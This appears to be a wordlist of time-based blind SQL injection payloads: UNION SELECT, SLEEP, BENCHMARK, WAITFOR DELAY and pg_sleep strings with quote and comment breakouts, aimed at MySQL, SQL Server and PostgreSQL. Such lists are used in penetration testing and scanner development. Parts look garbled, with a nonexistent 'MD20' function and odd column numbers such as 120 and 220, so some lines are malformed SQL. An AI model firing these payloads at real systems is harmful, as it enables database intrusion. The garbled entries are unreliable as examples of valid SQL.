UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29,30#
WAITFOR DELAY '0:0:20'
XOR(if(now()=sysdate(),sleep(20),0))OR'
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY))|[1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))|[1
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
` WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND `1`=`1
and 0=benchmark(3000000,MD20(1))%20%23
and 0=benchmark(3000000,MD20(1))%20--
and 0=benchmark(3000000,MD20(1))%20/*
and SELECT SLEEP(20); #
and SELECT pg_sleep(20);
and WAITFOR DELAY '0:0:20'
and WAITFOR DELAY '0:0:20'--
and sleep 20
and sleep 20--
and sleep(20)
and sleep(20)--
benchmark(1000000000,md20(1))--
benchmark(200000000,MD20(1))
benchmark(200000000,MD20(1))#
benchmark(200000000,MD20(1))--
desc%2c(select*from(select(sleep(20)))a)
if(now()=sysdate(),sleep(20),0)
if(now()=sysdate(),sleep(20),0)/"XOR(if(now()=sysdate(),sleep(20),0))OR"/
or SELECT SLEEP(20); #
or SELECT pg_sleep(20);
or SLEEP(20)
or SLEEP(20)#
or SLEEP(20)--
or SLEEP(20)="
or SLEEP(20)='
or WAITFOR DELAY '0:0:20'
or WAITFOR DELAY '0:0:20'--
or benchmark(200000000,MD20(1))
or benchmark(200000000,MD20(1))#
or benchmark(200000000,MD20(1))--
or pg_SLEEP(20)
or pg_SLEEP(20)#
or pg_SLEEP(20)--
or sleep 20
or sleep 20--
or sleep(20)
or sleep(20)--
pg_SLEEP(20)
pg_SLEEP(20)#
pg_SLEEP(20)--
pg_sleep(20)
pg_sleep(20)--
sleep(20)
sleep(20)#
sleep(20)++
sleep(20)--
sleep(20)--+
waitfor delay '00:00:20'#
waitfor delay '00:00:20'++
waitfor delay '00:00:20'--
||(SELECT 0x20720206971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||
